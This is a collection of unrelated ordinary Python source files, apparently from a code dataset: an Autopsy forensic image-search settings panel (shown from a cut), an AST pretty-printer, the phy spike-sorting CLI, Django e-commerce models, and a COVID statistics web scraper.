ff = fileChooser.getSelectedFile()
path = ff.getCanonicalPath()
self.textInputs[code].text = path
def initComponents(self):
self.setLayout(None)
self.setPreferredSize(Dimension(500, 400))
lblNewLabel = JLabel("Detector model path:")
lblNewLabel.setBounds(45, 144, 227, 16)
self.add(lblNewLabel)
lblNewLabel_1 = JLabel("Recognition model path:")
lblNewLabel_1.setBounds(44, 210, 228, 16)
self.add(lblNewLabel_1)
lblNewLabel_2 = JLabel("Shape predictor model path:")
lblNewLabel_2.setBounds(45, 275, 227, 16)
self.add(lblNewLabel_2)
self.textInputs['0'].setBounds(44, 173, 228, 22)
self.textInputs['0'].setColumns(30)
self.add(self.textInputs['0'])
self.textInputs['1'].setColumns(30)
self.textInputs['1'].setBounds(44, 238, 228, 22)
self.add(self.textInputs['1'])
self.textInputs['2'].setColumns(30)
self.textInputs['2'].setBounds(45, 304, 228, 22)
self.add(self.textInputs['2'])
self.buttons['0'].setBounds(284, 172, 97, 25)
self.buttons['0'].setActionCommand("0")
self.add(self.buttons['0'])
self.buttons['1'].setBounds(284, 237, 97, 25)
self.buttons['1'].setActionCommand("1")
self.add(self.buttons['1'])
self.buttons['2'].setBounds(284, 303, 97, 25)
self.buttons['2'].setActionCommand("2")
self.add(self.buttons['2'])
self.save_file_cbox = JCheckBox(C_LABEL_INFO_AUTOPSY_TEMP)
self.save_file_cbox.setBounds(45, 98, 300, 25)
self.add(self.save_file_cbox)
#----------------------------------------------------------------
# Case level settings object class
#----------------------------------------------------------------
class UISettings(IngestModuleIngestJobSettings):
serialVersionUID = 1L
def __init__(self):
# JPG JPEG PNG Delete file after
self.flags = [True, True, True, True]
self.paths = {
"1": ""
}
def getVersionNumber(self):
return self.serialVersionUID
def getFlag(self, pos):
return self.flags[pos]
def setFlag(self, flag, pos):
self.flags[pos] = flag
def setPath(self, code, path):
self.paths[code] = path
def getAllPaths(self):
return self.paths
def getAllFlags(self):
return self.flags
def getPath(self, code):
return self.paths[code]
def loadConfig(self):
CONFIGURATION_PATH = Case.getCurrentCase().getModuleDirectory() + "\\config.json"
if os.path.exists(CONFIGURATION_PATH):
with open(CONFIGURATION_PATH, "r") as out:
content = json.load(out)
self.flags = content['flags']
self.paths['1'] = content['wanted_folder']
#-------------------------------------------------------------
# Case level settings UI class
#-------------------------------------------------------------
class UISettingsPanel(IngestModuleIngestJobSettingsPanel):
def __init__(self, settings):
self.localSettings = settings
self.buttons = {
'1': JButton("Choose", actionPerformed=self.chooseFolder),
}
self.textInputs = {
"1": JTextField('', 5),
}
self.initComponents()
self.customizeComponents()
def checkBoxEvent(self, event):
self.localSettings.setFlag(self.checkboxJPG.isSelected(), 0)
self.localSettings.setFlag(self.checkboxJPEG.isSelected(), 1)
self.localSettings.setFlag(self.checkboxPNG.isSelected(), 2)
self.localSettings.setFlag(self.chckbxGenerateImageHash.isSelected(), 3)
def clear(self, e):
button = e.getSource()
code = button.getActionCommand()
self.localSettings.setPath(code, "")
self.textInputs[code].text = ""
def chooseFolder(self, e):
button = e.getSource()
code = button.getActionCommand()
fileChooser = JFileChooser()
fileChooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY)
text = "Choose folder"
ret = fileChooser.showDialog(self, text)
if ret == JFileChooser.APPROVE_OPTION:
ff = fileChooser.getSelectedFile()
path = ff.getCanonicalPath()
self.localSettings.setPath(code, path)
self.textInputs[code].text = path
def initComponents(self):
self.setLayout(None)
lblFileExtensionsTo = JLabel("File extensions to look for:")
lblFileExtensionsTo.setBounds(43, 37, 161, 16)
self.add(lblFileExtensionsTo)
self.checkboxPNG = JCheckBox(".PNG", actionPerformed=self.checkBoxEvent)
self.checkboxPNG.setBounds(43, 62, 72, 25)
self.add(self.checkboxPNG)
self.checkboxJPG = JCheckBox(".JPG", actionPerformed=self.checkBoxEvent)
self.checkboxJPG.setBounds(43, 92, 72, 25)
self.add(self.checkboxJPG)
self.checkboxJPEG = JCheckBox(".JPEG", actionPerformed=self.checkBoxEvent)
self.checkboxJPEG.setBounds(118, 62, 113, 25)
self.add(self.checkboxJPEG)
lblNewLabel = JLabel("Folder with images of person to find:")
lblNewLabel.setBounds(43, 145, 223, 16)
self.add(lblNewLabel)
textField = self.textInputs['1']
textField.setBounds(43, 167, 223, 22)
self.add(textField)
textField.setColumns(30)
self.buttons['1'].setActionCommand("1")
self.buttons['1'].setBounds(43, 195, 113, 25)
self.add(self.buttons['1'])
#TODO:: This no longer is required, it's done within the executable
self.chckbxGenerateImageHash = JCheckBox("Generate image hash for DFXML")
self.chckbxGenerateImageHash.setBounds(43, 239, 223, 25)
self.add(self.chckbxGenerateImageHash)
def customizeComponents(self):
self.localSettings.loadConfig()
self.checkboxJPG.setSelected(self.localSettings.getFlag(0))
self.checkboxJPEG.setSelected(self.localSettings.getFlag(1))
self.checkboxPNG.setSelected(self.localSettings.getFlag(2))
self.chckbxGenerateImageHash.setSelected(self.localSettings.getFlag(3))
for code in self.textInputs:
self.textInputs[code].text = self.localSettings.getPath(code)
def getSettings(self):
return self.localSettings
|
# Copyright (c) 2010, James Hanlon, All rights reserved
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
import sys
import ast
from walker import NodeWalker
from definitions import *
from typedefs import *
INDENT = ' '
NO_INDENT = ''
class Printer(NodeWalker):
"""
A walker class to pretty-print the AST in the langauge syntax.
"""
def __init__(self, buf=sys.stdout, labels=False):
super(Printer, self).__init__()
self.buf = buf
self.labels = labels
self.indent = []
def indt(self):
"""
Produce an indent. If its the first statement of a seq or par block we
only produce a single space.
"""
if len(self.indent) > 0:
if self.indent[-1] == NO_INDENT:
return ''
else:
return INDENT*(len(self.indent))
#return ''.join([x for x in self.indent])
return ''
def out(self, s):
"""
Write an indented line.
"""
self.buf.write(self.indt()+s)
def arg_list(self, args):
return ', '.join([self.expr(x) for x in args])
def var_decls(self, decls):
self.buf.write((self.indt() if len(decls)>0 else '')
+(';\n'+self.indt()).join(
[self.decl(x) for x in decls]))
if len(decls)>0: self.buf.write(';\n')
def display_location(self, stmt):
if self.labels and hasattr(stmt, 'location') and not stmt.location==None:
self.out('@({})\n'.format(self.expr(stmt.location)))
# Program ============================================
def walk_program(self, node):
# Program declarations
self.var_decls(node.decls)
self.buf.write('\n')
# Program definitions (procedures)
[self.defn(x, 0) for x in node.defs]
# Variable declarations ===============================
def decl(self, node):
if node.type == T_VAL_SINGLE:
return 'val {} is {}'.format(node.name, self.expr(node.expr))
if node.type == T_VAR_SINGLE:
return 'var {}'.format(node.name)
elif node.type == T_VAR_ARRAY:
return 'var {}[{}]'.format(node.name, self.expr(node.expr))
elif node.type == T_REF_ARRAY:
return node.name+'[]'
elif node.type == T_CHAN_SINGLE:
return 'chan '+node.name
elif node.type == T_CHAN_ARRAY:
return 'chan '+node.name+'[{}]'.format(self.expr(node.expr))
elif node.type == T_CHANEND_SINGLE:
return 'chanend '+node.name
elif node.type == T_CHANEND_SERVER_SINGLE:
return 'server chanend '+node.name
elif node.type == T_CHANEND_CLIENT_SINGLE:
return 'client chanend '+node.name
else:
assert 0
# Procedure declarations ==============================
def defn(self, node, d):
# Procedure definition
name = node.name if node.name != '_main' else 'main'
self.buf.write('{} {}({})'.format(node.type.specifier, name,
', '.join([self.param(x) for x in node.formals])))
# If it is a prototype
if not node.stmt:
self.buf.write(';\n\n')
else:
self.buf.write(' is\n')
# Statement block
if (isinstance(node.stmt, ast.StmtPar)
or isinstance(node.stmt, ast.StmtSeq)):
#self.indent.pop()
self.display_location(node.stmt)
self.stmt(node.stmt)
self.buf.write('\n\n')
else:
self.indent.append(INDENT)
self.display_location(node.stmt)
self.stmt(node.stmt)
self.buf.write('\n\n')
self.indent.pop()
# Formals =============================================
def param(self, node):
if node.type == T_VAL_SINGLE:
return 'val '+node.name
elif node.type == T_REF_SINGLE:
return 'var '+node.name
elif node.type == T_REF_ARRAY:
return 'var {}[{}]'.format(node.name, self.expr(node.expr))
elif node.type == T_CHANEND_SINGLE:
return 'chanend {}'.format(node.name)
elif node.type == T_CHANEND_SERVER_SINGLE:
return 'chanend server {}'.format(node.name)
elif node.type == T_CHANEND_CLIENT_SINGLE:
return 'chanend client {}'.format(node.name)
elif node.type == T_CHANEND_ARRAY:
return 'chanend {}[{}]'.format(node.name, self.expr(node.expr))
elif node.type == T_CHAN_SINGLE:
return 'chan {}'.format(node.name)
elif node.type == T_CHAN_ARRAY:
return 'chan {}[{}]'.format(node.name, self.expr(node.expr))
else:
assert 0
# Statements ==========================================
def stmt_block(self, node, sep):
"""
Output a block of statements. E.g.::
{
stmt1;
stmt2;
{ stmt3 &
stmt4
};
stmt5
}
"""
self.out('{\n')
self.indent.append(INDENT)
self.var_decls(node.decls)
for (i, x) in enumerate(node.stmt):
if sep=='&':
self.stmt(x)
else:
self.stmt(x)
self.buf.write(sep if i<(len(node.stmt)-1) else '')
self.buf.write('\n')
self.indent.pop()
self.out('}')
if hasattr(node, 'distribute') and node.distribute:
self.out('$')
def stmt_seq(self, node):
self.stmt_block(node, ';')
def stmt_par(self, node):
self.stmt_block(node, '&')
def stmt_server(self, node):
#self.display_location(node)
self.out('server({}){}\n'.format(', '.join(
[self.param(x) for x in node.decls]), '$' if node.distribute else ''))
self.indent.append(INDENT)
#self.display_location(node.server)
self.stmt(node.server)
self.indent.pop()
self.out('\n')
self.indent.append(INDENT)
#self.display_location(node.client)
self.stmt(node.client)
self.indent.pop()
def stmt_rep(self, node):
self.out('par {} do\n'.format(
', '.join([self.elem(x) for x in node.indices])))
self.indent.append(INDENT)
self.display_location(node.stmt)
self.stmt(node.stmt)
self.indent.pop()
def stmt_on(self, node):
self.out('on {} do\n'.format(self.expr(node.expr)))
self.indent.append(INDENT)
# NOTE: This location won't show where we have made substitutions in
# transform par and rep and we hav'nt updated the location labels.
self.display_location(node.stmt)
self.stmt(node.stmt)
self.indent.pop()
def stmt_skip(self, node):
self.out('skip')
def stmt_pcall(self, node):
self.out('{}({})'.format(
node.name, self.arg_list(node.args)))
def stmt_ass(self, node):
self.out('{} := {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_in(self, node):
self.out('{} ? {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_out(self, node):
self.out('{} ! {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_in_tag(self, node):
self.out('{} ?? {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_out_tag(self, node):
self.out('{} !! {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_alias(self, node):
self.out('{} aliases {}'.format(
self.elem(node.left), self.elem(node.slice)))
def stmt_connect(self, node):
if node.type == CONNECT_MASTER:
self.out('connect {}:{} to slave {}'.format(self.elem(node.left),
self.expr(node.id), self.expr(node.expr)))
elif node.type == CONNECT_SLAVE:
self.out('connect {}:{} to master {}'.format(self.elem(node.left),
self.expr(node.id), self.expr(node.expr)))
elif node.type == CONNECT_CLIENT:
self.out('connect {}:{} to server {}'.format(self.elem(node.left),
self.expr(node.id), self.expr(node.expr)))
elif node.type == CONNECT_SERVER:
self.out('connect {}:{} to client'.format(self.elem(node.left),
self.expr(node.id)))
else:
assert 0
def stmt_if(self, node):
self.out('if {}\n'.format(self.expr(node.cond)))
self.out('then\n')
self.indent.append(INDENT)
self.stmt(node.thenstmt) ; self.buf.write('\n')
self.indent.pop()
self.out('else\n')
self.indent.append(INDENT)
self.stmt(node.elsestmt)
self.indent.pop()
def stmt_while(self, node):
self.out('while {} do\n'.format(self.expr(node.cond)))
self.indent.append(INDENT)
self.stmt(node.stmt)
self.indent.pop()
def stmt_for(self, node):
self.out('for {} do\n'.format(self.elem(node.index)))
self.indent.append(INDENT)
self.stmt(node.stmt)
self.indent.pop()
def stmt_assert(self, node):
self.out('assert {}'.format(self.expr(node.expr)))
def stmt_return(self, node):
self.out('return {}'.format(self.expr(node.expr)))
# Expressions =========================================
def expr_single(self, node):
return self.elem(node.elem)
def expr_unary(self, node):
return '({}{})'.format(node.op, self.elem(node.elem))
def expr_binop(self, node):
return '{} {} {}'.format(self.elem(node.elem),
node.op, self.expr(node.right))
# Elements= ===========================================
def elem_group(self, node):
return '({})'.format(self.expr(node.expr))
def elem_sub(self, node):
return '{}[{}]'.format(node.name, self.expr(node.expr))
def elem_slice(self, node):
return '{}[{} for {}]'.format(node.name,
self.expr(node.base), self.expr(node.count))
def elem_index_range(self, node):
return '{} in [{} for {}]'.format(node.name,
self.expr(node.base), self.expr(node.count))
def elem_fcall(self, node):
return '{}({})'.format(node.name, self.arg_list(node.args))
def elem_pcall(self, node):
return '{}({})'.format(node.name, self.arg_list(node.args))
def elem_number(self, node):
return '{}'.format(node.value)
def elem_boolean(self, node):
return '{}'.format(node.value)
def elem_string(self, node):
return '{}'.format(node.value)
def elem_char(self, node):
return '{}'.format(node.value)
def elem_id(self, node):
return node.name
|
# -*- coding: utf-8 -*-
"""phy main CLI tool.
Usage:
phy --help
"""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import sys
import os.path as op
import re
import argparse
from textwrap import dedent
from ..ext.six import exec_
#------------------------------------------------------------------------------
# Main script
#------------------------------------------------------------------------------
class Parser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write(message + '\n\n')
self.print_help()
sys.exit(2)
class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter,
argparse.RawDescriptionHelpFormatter):
pass
def _parse_extra(extra):
kwargs = {}
reg = re.compile(r'^--([^\=]+)=([^\=]+)$')
for e in extra:
r = reg.match(e)
if r:
key, value = r.group(1), r.group(2)
key = key.replace('-', '_')
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
pass
kwargs[key] = value
return kwargs
def _parse_args(args):
desc = sys.modules['phy'].__doc__
epilog = dedent("""
examples:
phy -v display the version of phy
phy describe my_file.kwik
display information about a Kwik dataset
phy cluster-auto my_file.kwik --num-clusters-start=100
run klustakwik on a dataset
phy cluster-manual my_file.kwik
run the manual clustering GUI
""")
parser = Parser(description=desc, epilog=epilog,
formatter_class=CustomFormatter,
)
# Allowed subcommands.
commands = [
'cluster-auto',
'cluster-manual',
'describe', # describe a dataset
# TODO:
# 'notebook', # start a new analysis notebook
# 'detect-spikes',
]
parser.add_argument('command',
choices=commands,
help='command to execute')
parser.add_argument('file',
help='file to execute the command on')
import phy
parser.add_argument('--version', '-v',
action='version',
version=phy.__version__,
help='print the version of phy')
parser.add_argument('--debug', '-d',
action='store_true',
help='activate debug logging mode')
parser.add_argument('--profiler', '-p',
action='store_true',
help='activate the profiler')
parser.add_argument('--line-profiler', '-lp',
dest='line_profiler',
action='store_true',
help='activate the line-profiler -- you need to '
'decorate the functions to profile with `@profile` '
'in the code')
parser.add_argument('--ipython', '-i', action='store_true',
help='launch the script in an interactive '
'IPython console')
parser.add_argument('--clustering', default='main',
help='name of the clustering to use')
parser.add_argument('--cluster_ids', '-c',
help='list of clusters to select initially')
parse, extra = parser.parse_known_args(args)
kwargs = _parse_extra(extra)
return parse, kwargs
def run_manual(kwik_path, clustering=None, interactive=False,
cluster_ids=None):
import phy
from phy.cluster import Session
from phy.gui import start_qt_app, run_qt_app
if not op.exists(kwik_path):
print("The file `{}` doesn't exist.".format(kwik_path))
return 1
print("\nLoading {}...".format(kwik_path))
session = Session(kwik_path,
clustering=clustering,
)
print("Data successfully loaded!\n")
session.model.describe()
start_qt_app()
gui = session.show_gui(cluster_ids=cluster_ids, show=False)
print("\nPress `ctrl+h` to see the list of keyboard shortcuts.\n")
# Interactive mode with IPython.
if interactive:
print("\nStarting IPython...")
from IPython import start_ipython
# Namespace.
ns = {'phy': phy,
'session': session,
'model': session.model,
'kwik_path': kwik_path,
'gui': gui,
}
start_ipython(["--gui=qt", "-i", "-c='gui.show()'"], user_ns=ns)
else:
gui.show()
run_qt_app()
def run_auto(kwik_path, clustering=None, interactive=False, **kwargs):
from phy.cluster import Session
if not op.exists(kwik_path):
print("The file `{}` doesn't exist.".format(kwik_path))
return
session = Session(kwik_path, use_store=False)
session.cluster(clustering=clustering, **kwargs)
session.save()
session.close()
def describe(kwik_path, clustering=None):
from phy.io.kwik import KwikModel
if not op.exists(kwik_path):
print("The file `{}` doesn't exist.".format(kwik_path))
return
model = KwikModel(kwik_path, clustering=clustering)
model.describe()
model.close()
def main():
args, kwargs = _parse_args(sys.argv[1:])
if args.profiler or args.line_profiler:
from phy.utils.testing import _enable_profiler, _profile
prof = _enable_profiler(args.line_profiler)
else:
prof = None
import phy
if args.debug:
phy.debug()
if args.cluster_ids:
cluster_ids = list(map(int, args.cluster_ids.split(',')))
else:
cluster_ids = None
if args.command == 'cluster-manual':
cmd = ('run_manual(args.file, clustering=args.clustering, '
'interactive=args.ipython, cluster_ids=cluster_ids)')
elif args.command == 'cluster-auto':
cmd = ('run_auto(args.file, clustering=args.clustering, '
'interactive=args.ipython, **kwargs)')
elif args.command == 'describe':
cmd = 'describe(args.file)'
else:
raise NotImplementedError()
if not prof:
exec_(cmd, globals(), locals())
else:
_profile(prof, cmd, globals(), locals())
#------------------------------------------------------------------------------
# Entry point
#------------------------------------------------------------------------------
if __name__ == '__main__':
main()
|
from django.db import models
from django.contrib.auth.models import User
from jsonfield import JSONField
# Create your models here.
class FirstClass(models.Model):
first_class_name = models.CharField(max_length=100, help_text='一级类目名称', unique=True)
cover_path = models.ImageField(upload_to='sjmeigou/goods/firstclass/%Y%m%d')
sort_order = models.SmallIntegerField(unique=True)
last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
create_time = models.DateTimeField(auto_now_add=True, editable=False)
update_time = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return self.first_class_name
class Meta:
ordering = ['sort_order']
class SecondClass(models.Model):
first_class = models.ForeignKey(to='FirstClass', on_delete=models.CASCADE, help_text='选择一级类目',
related_name='second_classes')
second_class_name = models.CharField(max_length=100, help_text='填写二级类目名称')
last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
create_time = models.DateTimeField(auto_now_add=True, editable=False)
update_time = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return "%s:%s" % (self.first_class.first_class_name, self.second_class_name)
class Meta:
unique_together = ['first_class', 'second_class_name']
class ThirdClass(models.Model):
second_class = models.ForeignKey(to='SecondClass', on_delete=models.CASCADE, help_text='选择二级类目')
third_class_name = models.CharField(max_length=100, help_text='填写三级类目名称')
last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
create_time = models.DateTimeField(auto_now_add=True, editable=False)
update_time = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return "%s:%s:%s" % (
self.second_class.first_class.first_class_name, self.second_class.second_class_name, self.third_class_name)
class Meta:
unique_together = ['second_class', 'third_class_name']
class FirstProperty(models.Model):
first_property_name = models.CharField(max_length=100, help_text='填写类目属性')
third_class = models.ForeignKey(to='ThirdClass', on_delete=models.CASCADE, blank=True, help_text='选择三级类目')
last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
create_time = models.DateTimeField(auto_now_add=True, editable=False)
update_time = models.DateTimeField(auto_now=True, editable=False)
def __str__(self):
return "%s:%s:%s:%s" % (
self.third_class.second_class.first_class.first_class_name, self.third_class.second_class.second_class_name,
self.third_class.third_class_name, self.first_property_name)
class Meta:
unique_together = ['third_class', 'first_property_name']
class SecondProperty(models.Model):
second_property_name = models.CharField(max_length=100, help_text='填写二级属性名称')
first_property = models.ForeignKey(to='FirstProperty', on_delete=models.CASCADE, help_text='选择一级属性',
related_name='secondProperties')
last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
create_time = models.DateTimeField(auto_now_add=True, editable=False)
update_time = models.DateTimeField(auto_now=True, editable=False)
class Meta:
unique_together = ['first_property', 'second_property_name']
class ItemsGroupDesc(models.Model):
owner = models.ForeignKey(to=User, on_delete=models.CASCADE, editable=False)
items = JSONField()
class SizeGroup(models.Model):
group_name = models.CharField(max_length=50)
second_class = models.ForeignKey(to='SecondClass', on_delete=models.CASCADE)
def __str__(self):
return '%s:%s-%s' % (self.second_class.second_class_name, self.group_name, self.id)
class SizeDesc(models.Model):
size_group = models.ForeignKey(to='SizeGroup', on_delete=models.CASCADE, related_name='sizes')
size_name = models.CharField(max_length=50)
class Meta:
unique_together = ('size_group', 'size_name')
ordering = ('id',)
class SizeGroupClass(models.Model):
third_class = models.ForeignKey(to='ThirdClass', on_delete=models.CASCADE, related_name='size_group_classes')
size_group = models.ForeignKey(to='SizeGroup', on_delete=models.CASCADE, related_name='size_classes')
class SKUColor(models.Model):
good_detail = models.ForeignKey(to='GoodDetail', on_delete=models.CASCADE, related_name='colors')
color_name = models.CharField(max_length=20)
color_remark = models.CharField(max_length=30, blank=True, null=True)
color_pic = models.CharField(max_length=255)
color_code = models.CharField(max_length=7)
class SKU(models.Model):
color = models.ForeignKey(to='SKUColor',related_name='skus',on_delete=models.CASCADE)
price = models.DecimalField(max_digits=20, decimal_places=2)
stock = models.IntegerField(default=0)
size = models.ForeignKey(to='SizeDesc', on_delete=models.SET_NULL,null=True)
merchant_coding = models.CharField(max_length=50,blank=True,null=True)
barcode = models.CharField(max_length=100,blank=True,null=True)
class GoodDetail(models.Model):
owner=models.ForeignKey(to=User,editable=False,on_delete=models.CASCADE,related_name='goodDetails')
third_class=models.ForeignKey(to='ThirdClass',on_delete=models.DO_NOTHING,related_name='goodDetails')
title=models.CharField(max_length=50)
params = JSONField()
master_map = models.URLField(null=True)
master_graphs = JSONField()
master_video=models.URLField(null=True,blank=True)
min_price = models.DecimalField(max_digits=20, decimal_places=2)
total_stock = models.IntegerField(default=0)
merchant_coding=models.CharField(max_length=50,blank=True,null=True)
barcode = models.CharField(max_length=100,blank=True,null=True)
stock_count_strategy=models.IntegerField(
choices=((0,'买家拍下减库存'),(1,'买家付款减库存')),default=0
)
to_deliver_hours = models.IntegerField(choices=(
(1, '1小时内'), (2, '2小时内'), (24, '24小时内'), (48, '48小时内')
))
put_on_sale_time=models.DateTimeField()
put_on_strategy=models.SmallIntegerField(default=0,choices=((0,'立即上架'),(1,'定时上架'),(2,'放入仓库内')))
state=models.SmallIntegerField(default=0,choices=((0,'出售中'),(1,'仓库中'),(2,'已删除')),editable=False)
item_desc=models.OneToOneField(to='ItemsGroupDesc',on_delete=models.CASCADE)
good_type=models.ForeignKey(to='store.GoodsType',on_delete=models.SET_NULL,blank=True,null=True,related_name='goods')
store=models.ForeignKey(to='store.Stores',on_delete=models.CASCADE,editable=False,related_name='goods')
create_time=models.DateTimeField(auto_now_add=True,editable=False)
class AfterSaleServices(models.Model):
good_detail = models.ForeignKey(to='GoodDetail', on_delete=models.CASCADE,related_name='after_sale_services')
server= models.IntegerField(
choices=((0, '提供发票'), (1, '保修服务'), (2, '退换货承诺,凡使用微信购买本店商品,若存在质量问题或与描述不符,本店将主动退换货服务并承担来回运费'),
(3, '服务承诺:该类商品必须支持【七天退货服务】')),default=3)
class GoodDeliver(models.Model):
good_detail = models.ForeignKey(to='GoodDetail',on_delete=models.CASCADE,related_name='delivers')
server = models.ForeignKey(to='platforms.Delivers',on_delete=models.CASCADE)
class SearchHistory(models.Model):
user = models.ForeignKey(to=User,on_delete=models.CASCADE)
q= models.CharField(max_length=128)
update_time=models.DateTimeField(auto_now=True)
class Meta:
ordering=('-update_time',) |
import requests
from bs4 import BeautifulSoup
import pandas as pd
from model import country
def getTable():
"""Extracting HTML table from worldometers."""
URL = "https://www.worldometers.info/coronavirus/"
page = requests.get(URL)
soup = BeautifulSoup(page.content, 'html.parser')
return soup.find(id='main_table_countries_today')
def createDataFrame():
"""Creating pandas dataframe headers."""
headers = []
for i in getTable().find_all('th'):
title = i.text
headers.append(title)
return pd.DataFrame(columns=headers)
def dataFrameToNumpyArray():
"""Filling pandas dataframe with rows and converting it to numpy array."""
df = createDataFrame()
for j in getTable().find_all('tr')[1:]:
row_data = j.find_all('td')
row = [tr.text for tr in row_data]
length = len(df)
df.loc[length] = row
return df.to_numpy()
def fillCountriesList():
"""Filling the list of Country objects."""
df = dataFrameToNumpyArray()
countries = []
for row in df[7:]:
countries.append(
country.Country(
row[1],
row[2],
row[3],
row[4],
row[5],
row[6],
row[7],
row[8],
row[9],
row[10],
row[11],
row[12],
row[13],
row[14],
row[15],
row[16],
row[17],
row[18],
row[19],
row[20],
row[21]))
return countries
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.